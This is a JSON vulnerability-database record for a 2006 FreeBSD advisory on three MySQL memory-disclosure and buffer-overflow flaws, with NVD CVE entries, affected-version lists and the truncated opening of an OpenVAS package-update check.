{"id": "4913886C-E875-11DA-B9F4-00123FFE8333", "bulletinFamily": "unix", "title": "MySQL -- Information Disclosure and Buffer Overflow Vulnerabilities", "description": "\nSecunia reports:\n\nMySQL have some vulnerabilities, which can be exploited by\n\t malicious users to disclose potentially sensitive information\n\t and compromise a vulnerable system.\n1) An error within the code that generates an error response\n\t to an invalid COM_TABLE_DUMP packet can be exploited by an\n\t authenticated client to disclosure certain memory content of the\n\t server process.\n2) A boundary error within the handling of specially crafted\n\t invalid COM_TABLE_DUMP packets can be exploited by an authenticated\n\t client to cause a buffer overflow and allows arbitrary code\n\t execution.\n3) An error within the handling of malformed login packets can be\n\t exploited to disclosure certain memory content of the server\n\t process in the error messages.\n\n", "published": "2006-05-02T00:00:00", "modified": "2006-05-02T00:00:00", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "href": "https://vuxml.freebsd.org/freebsd/4913886c-e875-11da-b9f4-00123ffe8333.html", "reporter": "FreeBSD", "references": ["http://dev.mysql.com/doc/refman/4.1/en/news-4-0-27.html", "http://dev.mysql.com/doc/refman/4.1/en/news-4-1-19.html", "http://www.wisec.it/vulns.php?page=8", "http://www.vuxml.org/freebsd/a8d8713e-dc83-11da-a22b-000c6ec775d9.html", "http://www.wisec.it/vulns.php?page=7", "http://secunia.com/advisories/19929/", "http://dev.mysql.com/doc/refman/5.1/en/news-5-1-10.html"], "cvelist": ["CVE-2006-1517", "CVE-2006-1518", "CVE-2006-1516"], "type": "freebsd", "lastseen": "2019-05-29T18:34:44", "edition": 4, "viewCount": 4, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2006-1518", "CVE-2006-1517", "CVE-2006-1516"]}, {"type": "nessus", "idList": ["SUSE_MYSQL-1312.NASL", "MYSQL_5_0_21.NASL", "GENTOO_GLSA-200605-13.NASL", "DEBIAN_DSA-1071.NASL", "DEBIAN_DSA-1073.NASL", "DEBIAN_DSA-1079.NASL", "FREEBSD_PKG_4913886CE87511DAB9F400123FFE8333.NASL", "SUSE_SA_2006_036.NASL", "MANDRAKE_MDKSA-2006-084.NASL", "SLACKWARE_SSA_2006-129-02.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:56730", "OPENVAS:56728", "OPENVAS:136141256231056730", "OPENVAS:136141256231056861", "OPENVAS:56861", "OPENVAS:56850", "OPENVAS:56788", "OPENVAS:56833", "OPENVAS:56789", "OPENVAS:56714"]}, {"type": "slackware", "idList": ["SSA-2006-129-02", "SSA-2006-155-01"]}, {"type": "suse", "idList": ["SUSE-SA:2006:036"]}, {"type": "debian", "idList": ["DEBIAN:DSA-1073-1:5FA93", "DEBIAN:DSA-1071-1:F1DE3", "DEBIAN:DSA-1079-1:FCFFC"]}, {"type": "ubuntu", "idList": ["USN-283-1"]}, {"type": "gentoo", "idList": ["GLSA-200605-13"]}, {"type": "osvdb", "idList": ["OSVDB:25227", "OSVDB:25226", "OSVDB:25228"]}, {"type": "centos", "idList": ["CESA-2006:0544"]}, {"type": "exploitdb", "idList": ["EDB-ID:1741", "EDB-ID:1742"]}, {"type": "freebsd", "idList": ["A8D8713E-DC83-11DA-A22B-000C6EC775D9"]}, {"type": "cert", "idList": ["VU:602457"]}, {"type": "redhat", "idList": ["RHSA-2006:0544"]}], "modified": "2019-05-29T18:34:44", "rev": 2}, "score": {"value": 7.4, "vector": "NONE", "modified": "2019-05-29T18:34:44", "rev": 2}, "vulnersScore": 7.4}, "affectedPackage": [{"OS": "FreeBSD", "OSVersion": "any", "arch": "noarch", "operator": "lt", "packageFilename": "UNKNOWN", "packageName": "mysql-server", "packageVersion": "4.0.27"}], "scheme": null, "immutableFields": []}

{"cve": [{"lastseen": "2021-02-02T05:27:19", "description": "The check_connection function in sql_parse.cc in MySQL 4.0.x up to 4.0.26, 4.1.x up to 4.1.18, and 5.0.x up to 5.0.20 allows remote attackers to read portions of memory via a username without a trailing null byte, which causes a buffer over-read.", "edition": 6, "cvss3": {}, "published": "2006-05-05T12:46:00", "title": "CVE-2006-1516", "type": "cve", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2006-1516"], "modified": "2019-12-17T20:16:00", "cpe": ["cpe:/a:mysql:mysql:5.0.4", "cpe:/a:oracle:mysql:4.0.24", "cpe:/a:oracle:mysql:4.0.5a", "cpe:/a:oracle:mysql:4.0.17", "cpe:/a:mysql:mysql:5.0.5", "cpe:/a:oracle:mysql:5.0.12", "cpe:/a:oracle:mysql:5.0.7", "cpe:/a:oracle:mysql:4.0.0", "cpe:/a:oracle:mysql:4.1.5", "cpe:/a:oracle:mysql:4.1.2", "cpe:/a:oracle:mysql:4.0.14", "cpe:/a:mysql:mysql:5.0.1", "cpe:/a:mysql:mysql:4.1.8", "cpe:/a:oracle:mysql:4.0.11", "cpe:/a:mysql:mysql:4.1.14", "cpe:/a:oracle:mysql:4.0.3", "cpe:/a:oracle:mysql:4.1.16", "cpe:/a:mysql:mysql:4.1.3", "cpe:/a:oracle:mysql:4.1.17", "cpe:/a:oracle:mysql:5.0.0", "cpe:/a:oracle:mysql:4.0.8", "cpe:/a:oracle:mysql:4.0.12", "cpe:/a:oracle:mysql:4.1.7", "cpe:/a:oracle:mysql:4.1.3", "cpe:/a:oracle:mysql:4.0.18", "cpe:/a:oracle:mysql:4.0.6", "cpe:/a:oracle:mysql:4.0.2", "cpe:/a:oracle:mysql:4.0.1", "cpe:/a:mysql:mysql:5.0.3", "cpe:/a:oracle:mysql:5.0.13", "cpe:/a:oracle:mysql:4.0.4", "cpe:/a:mysql:mysql:4.1.0", "cpe:/a:mysql:mysql:5.0.2", "cpe:/a:mysql:mysql:4.1.12", "cpe:/a:oracle:mysql:4.0.7", "cpe:/a:mysql:mysql:5.0.16", "cpe:/a:oracle:mysql:4.1.4", "cpe:/a:mysql:mysql:4.1.13", "cpe:/a:mysql:mysql:4.1.10", "cpe:/a:oracle:mysql:4.1.6", "cpe:/a:oracle:mysql:4.0.19", "cpe:/a:oracle:mysql:5.0.14", "cpe:/a:oracle:mysql:5.0.11", "cpe:/a:oracle:mysql:4.0.10", "cpe:/a:oracle:mysql:5.0.8", "cpe:/a:oracle:mysql:5.0.9", "cpe:/a:oracle:mysql:4.1.0", "cpe:/a:mysql:mysql:4.1.15", "cpe:/a:mysql:mysql:5.0.15", "cpe:/a:oracle:mysql:5.0.6", "cpe:/a:oracle:mysql:4.0.5", "cpe:/a:oracle:mysql:4.0.20", "cpe:/a:oracle:mysql:4.0.21", "cpe:/a:oracle:mysql:4.1.11", "cpe:/a:oracle:mysql:4.1.18", "cpe:/a:oracle:mysql:4.0.25", "cpe:/a:oracle:mysql:4.0.13", "cpe:/a:oracle:mysql:4.1.9", "cpe:/a:oracle:mysql:5.0.3", "cpe:/a:mysql:mysql:5.0.10", "cpe:/a:oracle:mysql:4.0.15", "cpe:/a:oracle:mysql:4.0.9", "cpe:/a:oracle:mysql:4.0.23", "cpe:/a:oracle:mysql:5.0.18", "cpe:/a:oracle:mysql:4.0.16", "cpe:/a:mysql:mysql:5.0.17", "cpe:/a:oracle:mysql:4.0.26"], "id": "CVE-2006-1516", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-1516", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:a:oracle:mysql:4.0.23:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:4.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:4.0.16:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:4.1.18:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:4.1.9:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:4.1.7:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:4.0.11:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:4.1.4:*:*:*:*:*:*:*", "cpe:2.3:a:mysql:mysql:5.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.0.13:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:4.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:4.1.5:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:4.0.24:*:*:*:*:*:*:*", "cpe:2.3:a:mysql:mysql:5.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:mysql:mysql:4.1.13:*:*:*:*:*:*:*", "cpe:2.3:a:mysql:mysql:5.0.16:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:4.0.5a:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:4.0.20:*:*:*:*:*:*:*", "cpe:2.3:a:mysql:mysql:4.1.15:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:4.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:4.0.8:gamma:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.0.6:*:*:*:*:*:*:*", "cpe:2.3:a:mysql:mysql:4.1.14:*:*:*:*:*:*:*", "cpe:2.3:a:mysql:mysql:5.0.10:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:4.1.2:alpha:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:4.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.0.11:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:4.1.3:beta:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:4.0.14:*:*:*:*:*:*:*", "cpe:2.3:a:mysql:mysql:5.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:4.0.9:gamma:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:4.0.13:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.0.0:alpha:*:*:*:*:*:*", "cpe:2.3:a:mysql:mysql:4.1.10:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:4.0.19:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:4.0.8:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:4.0.7:*:*:*:*:*:*:*", "cpe:2.3:a:mysql:mysql:4.1.8:*:*:*:*:*:*:*", "cpe:2.3:a:mysql:mysql:4.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:4.0.7:gamma:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.0.7:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:4.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:4.1.6:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.0.3:beta:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:4.0.6:*:*:*:*:*:*:*", "cpe:2.3:a:mysql:mysql:5.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:mysql:mysql:4.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:mysql:mysql:4.1.12:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:4.0.26:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:4.1.11:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.0.9:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:4.0.15:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.0.8:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:4.0.18:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.0.14:*:*:*:*:*:*:*", "cpe:2.3:a:mysql:mysql:5.0.17:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:4.1.17:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:4.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:4.0.17:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:4.0.10:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:4.0.11:gamma:*:*:*:*:*:*", "cpe:2.3:a:mysql:mysql:5.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:4.0.21:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:4.0.9:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:4.0.12:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:4.1.16:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:4.1.0:alpha:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.0.12:*:*:*:*:*:*:*", "cpe:2.3:a:mysql:mysql:5.0.15:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.0.18:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:4.0.25:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T05:27:19", "description": "sql_parse.cc in MySQL 4.0.x up to 4.0.26, 4.1.x up to 4.1.18, and 5.0.x up to 5.0.20 allows remote attackers to obtain sensitive information via a COM_TABLE_DUMP request with an incorrect packet length, which includes portions of memory in an error message.", "edition": 6, "cvss3": {}, "published": "2006-05-05T12:46:00", "title": "CVE-2006-1517", "type": "cve", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2006-1517"], "modified": "2019-12-17T20:16:00", "cpe": ["cpe:/a:mysql:mysql:5.0.4", "cpe:/a:oracle:mysql:4.0.24", "cpe:/a:oracle:mysql:4.0.5a", "cpe:/a:oracle:mysql:4.0.17", "cpe:/a:mysql:mysql:5.0.5", "cpe:/a:oracle:mysql:5.0.12", "cpe:/a:oracle:mysql:5.0.7", "cpe:/a:oracle:mysql:4.0.0", "cpe:/a:oracle:mysql:4.1.5", "cpe:/a:oracle:mysql:4.1.2", "cpe:/a:oracle:mysql:4.0.14", "cpe:/a:mysql:mysql:5.0.1", "cpe:/a:mysql:mysql:4.1.8", "cpe:/a:oracle:mysql:4.0.11", "cpe:/a:mysql:mysql:4.1.14", "cpe:/a:oracle:mysql:4.0.3", "cpe:/a:oracle:mysql:4.1.16", "cpe:/a:mysql:mysql:4.1.3", "cpe:/a:oracle:mysql:4.1.17", "cpe:/a:oracle:mysql:5.0.0", "cpe:/a:oracle:mysql:4.0.8", "cpe:/a:oracle:mysql:4.0.12", "cpe:/a:oracle:mysql:4.1.7", "cpe:/a:oracle:mysql:4.1.3", "cpe:/a:oracle:mysql:4.0.18", "cpe:/a:oracle:mysql:4.0.6", "cpe:/a:oracle:mysql:4.0.2", "cpe:/a:oracle:mysql:4.0.1", "cpe:/a:mysql:mysql:5.0.3", "cpe:/a:oracle:mysql:5.0.13", "cpe:/a:oracle:mysql:4.0.4", "cpe:/a:mysql:mysql:4.1.0", "cpe:/a:mysql:mysql:5.0.2", "cpe:/a:mysql:mysql:4.1.12", "cpe:/a:oracle:mysql:4.0.7", "cpe:/a:mysql:mysql:5.0.16", "cpe:/a:oracle:mysql:4.1.4", "cpe:/a:mysql:mysql:4.1.13", "cpe:/a:mysql:mysql:4.1.10", "cpe:/a:oracle:mysql:4.1.6", "cpe:/a:oracle:mysql:4.0.19", "cpe:/a:oracle:mysql:5.0.14", "cpe:/a:oracle:mysql:5.0.11", "cpe:/a:oracle:mysql:4.0.10", "cpe:/a:oracle:mysql:5.0.8", "cpe:/a:oracle:mysql:5.0.9", "cpe:/a:oracle:mysql:4.1.0", "cpe:/a:mysql:mysql:4.1.15", "cpe:/a:mysql:mysql:5.0.15", "cpe:/a:oracle:mysql:5.0.6", "cpe:/a:oracle:mysql:4.0.5", "cpe:/a:oracle:mysql:4.0.20", "cpe:/a:oracle:mysql:4.0.21", "cpe:/a:oracle:mysql:4.1.11", "cpe:/a:oracle:mysql:4.1.18", "cpe:/a:oracle:mysql:4.0.25", "cpe:/a:oracle:mysql:4.0.13", "cpe:/a:oracle:mysql:4.1.9", "cpe:/a:oracle:mysql:5.0.3", "cpe:/a:mysql:mysql:5.0.10", "cpe:/a:oracle:mysql:4.0.15", "cpe:/a:oracle:mysql:4.0.9", "cpe:/a:oracle:mysql:4.0.23", "cpe:/a:oracle:mysql:5.0.18", "cpe:/a:oracle:mysql:4.0.16", "cpe:/a:mysql:mysql:5.0.17", "cpe:/a:oracle:mysql:4.0.26"], "id": "CVE-2006-1517", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-1517", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:a:oracle:mysql:4.0.23:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:4.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:4.0.16:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:4.1.18:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:4.1.9:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:4.1.7:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:4.0.11:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:4.1.4:*:*:*:*:*:*:*", "cpe:2.3:a:mysql:mysql:5.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.0.13:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:4.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:4.1.5:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:4.0.24:*:*:*:*:*:*:*", "cpe:2.3:a:mysql:mysql:5.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:mysql:mysql:4.1.13:*:*:*:*:*:*:*", "cpe:2.3:a:mysql:mysql:5.0.16:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:4.0.5a:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:4.0.20:*:*:*:*:*:*:*", "cpe:2.3:a:mysql:mysql:4.1.15:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:4.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:4.0.8:gamma:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.0.6:*:*:*:*:*:*:*", "cpe:2.3:a:mysql:mysql:4.1.14:*:*:*:*:*:*:*", "cpe:2.3:a:mysql:mysql:5.0.10:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:4.1.2:alpha:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:4.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.0.11:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:4.1.3:beta:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:4.0.14:*:*:*:*:*:*:*", "cpe:2.3:a:mysql:mysql:5.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:4.0.9:gamma:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:4.0.13:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.0.0:alpha:*:*:*:*:*:*", "cpe:2.3:a:mysql:mysql:4.1.10:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:4.0.19:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:4.0.8:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:4.0.7:*:*:*:*:*:*:*", "cpe:2.3:a:mysql:mysql:4.1.8:*:*:*:*:*:*:*", "cpe:2.3:a:mysql:mysql:4.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:4.0.7:gamma:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.0.7:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:4.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:4.1.6:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.0.3:beta:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:4.0.6:*:*:*:*:*:*:*", "cpe:2.3:a:mysql:mysql:5.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:mysql:mysql:4.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:mysql:mysql:4.1.12:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:4.0.26:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:4.1.11:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.0.9:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:4.0.15:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.0.8:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:4.0.18:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.0.14:*:*:*:*:*:*:*", "cpe:2.3:a:mysql:mysql:5.0.17:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:4.1.17:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:4.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:4.0.17:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:4.0.10:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:4.0.11:gamma:*:*:*:*:*:*", "cpe:2.3:a:mysql:mysql:5.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:4.0.21:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:4.0.9:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:4.0.12:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:4.1.16:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:4.1.0:alpha:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.0.12:*:*:*:*:*:*:*", "cpe:2.3:a:mysql:mysql:5.0.15:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.0.18:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:4.0.25:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T05:27:19", "description": "Buffer overflow in the open_table function in sql_base.cc in MySQL 5.0.x up to 5.0.20 might allow remote attackers to execute arbitrary code via crafted COM_TABLE_DUMP packets with invalid length values.", "edition": 5, "cvss3": {}, "published": "2006-05-05T12:46:00", "title": "CVE-2006-1518", "type": "cve", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "obtainUserPrivilege": true}, "cvelist": ["CVE-2006-1518"], "modified": "2019-12-17T20:16:00", "cpe": ["cpe:/a:mysql:mysql:5.0.4", "cpe:/a:mysql:mysql:5.0.5", "cpe:/a:oracle:mysql:5.0.12", "cpe:/a:oracle:mysql:5.0.7", "cpe:/a:oracle:mysql:5.0.19", "cpe:/a:mysql:mysql:5.0.1", "cpe:/a:oracle:mysql:5.0.0", "cpe:/a:mysql:mysql:5.0.20", "cpe:/a:mysql:mysql:5.0.3", "cpe:/a:oracle:mysql:5.0.13", "cpe:/a:mysql:mysql:5.0.2", "cpe:/a:mysql:mysql:5.0.16", "cpe:/a:oracle:mysql:5.0.14", "cpe:/a:oracle:mysql:5.0.11", "cpe:/a:oracle:mysql:5.0.8", "cpe:/a:oracle:mysql:5.0.9", "cpe:/a:mysql:mysql:5.0.15", "cpe:/a:oracle:mysql:5.0.6", "cpe:/a:oracle:mysql:5.0.3", "cpe:/a:mysql:mysql:5.0.10", "cpe:/a:oracle:mysql:5.0.18", "cpe:/a:mysql:mysql:5.0.17"], "id": "CVE-2006-1518", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-1518", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:mysql:mysql:5.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.0.13:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.0.19:*:*:*:*:*:*:*", "cpe:2.3:a:mysql:mysql:5.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:mysql:mysql:5.0.16:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.0.6:*:*:*:*:*:*:*", "cpe:2.3:a:mysql:mysql:5.0.10:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.0.11:*:*:*:*:*:*:*", "cpe:2.3:a:mysql:mysql:5.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.0.0:alpha:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.0.7:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.0.3:beta:*:*:*:*:*:*", "cpe:2.3:a:mysql:mysql:5.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.0.9:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.0.8:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.0.14:*:*:*:*:*:*:*", "cpe:2.3:a:mysql:mysql:5.0.17:*:*:*:*:*:*:*", "cpe:2.3:a:mysql:mysql:5.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.0.12:*:*:*:*:*:*:*", "cpe:2.3:a:mysql:mysql:5.0.15:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.0.18:*:*:*:*:*:*:*", "cpe:2.3:a:mysql:mysql:5.0.20:*:*:*:*:*:*:*"]}], "openvas": [{"lastseen": "2017-07-24T12:51:02", "bulletinFamily": "scanner", "cvelist": ["CVE-2006-1517", "CVE-2006-1518", "CVE-2006-1516"], "description": "The remote host is missing an update as announced\nvia advisory SSA:2006-129-02.", "modified": "2017-07-07T00:00:00", "published": "2012-09-11T00:00:00", "id": "OPENVAS:56730", "href": "http://plugins.openvas.org/nasl.php?oid=56730", "type": "openvas", "title": "Slackware Advisory SSA:2006-129-02 mysql", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: esoft_slk_ssa_2006_129_02.nasl 6598 2017-07-07 09:36:44Z cfischer $\n# Description: Auto-generated from the corresponding slackware advisory\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"New mysql packages are available for Slackware 10.2 and -current to\nfix security issues. The MySQL package shipped with Slackware 10.2\nmay possibly leak sensitive information found in uninitialized\nmemory to authenticated users. The MySQL package previously in\nSlackware -current also suffered from these flaws, but an additional\noverflow could allow arbitrary code execution.\n\nSince the vulnerabilities require a valid login and/or access to the\ndatabase server, the risk is moderate. Slackware does not provide\nnetwork access to a MySQL database by default.\";\ntag_summary = \"The remote host is missing an update as announced\nvia advisory SSA:2006-129-02.\";\n\ntag_solution = \"https://secure1.securityspace.com/smysecure/catid.html?in=SSA:2006-129-02\";\n \nif(description)\n{\n script_id(56730);\n script_tag(name:\"creation_date\", value:\"2012-09-11 01:34:21 +0200 (Tue, 11 Sep 2012)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 11:36:44 +0200 (Fri, 07 Jul 2017) $\");\n script_cve_id(\"CVE-2006-1516\", \"CVE-2006-1517\", \"CVE-2006-1518\");\n script_tag(name:\"cvss_base\", value:\"6.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:S/C:P/I:P/A:P\");\n script_version(\"$Revision: 6598 $\");\n name = \"Slackware Advisory SSA:2006-129-02 mysql \";\n script_name(name);\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2012 